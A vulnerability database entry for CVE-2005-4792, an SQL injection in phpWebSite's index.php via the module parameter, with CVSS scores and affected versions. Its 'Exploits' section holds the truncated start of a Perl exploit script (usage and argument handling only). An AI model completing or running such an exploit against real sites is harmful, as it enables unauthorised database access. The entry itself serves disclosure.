7.5
CVSSv2

CVE-2005-4792

Published: 31/12/2005 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in Appalachian State University phpWebSite 0.10.1 and previous versions allows remote malicious users to execute arbitrary SQL commands via the module parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

phpwebsite phpwebsite 0.10

phpwebsite phpwebsite 0.7.3

phpwebsite phpwebsite 0.8.3

phpwebsite phpwebsite 0.9.1

phpwebsite phpwebsite

phpwebsite phpwebsite 0.9.3

phpwebsite phpwebsite 0.9.3.1

phpwebsite phpwebsite 0.9.3.2

phpwebsite phpwebsite 0.9.3.3

phpwebsite phpwebsite 0.8.2

phpwebsite phpwebsite 0.9.0

phpwebsite phpwebsite 0.9.2

phpwebsite phpwebsite 0.9.3.4

Exploits

#!/usr/bin/perl use LWP::Simple; $serv = $ARGV[0]; $path = $ARGV[1]; $name = $ARGV[2]; sub usage { print "\nUsage: $0 [server] [path] [username] \n"; print "sever - URL\n"; print "path - path to indexphp\n"; print "username - name register user\n\n"; exit ();} sub work { print qq ...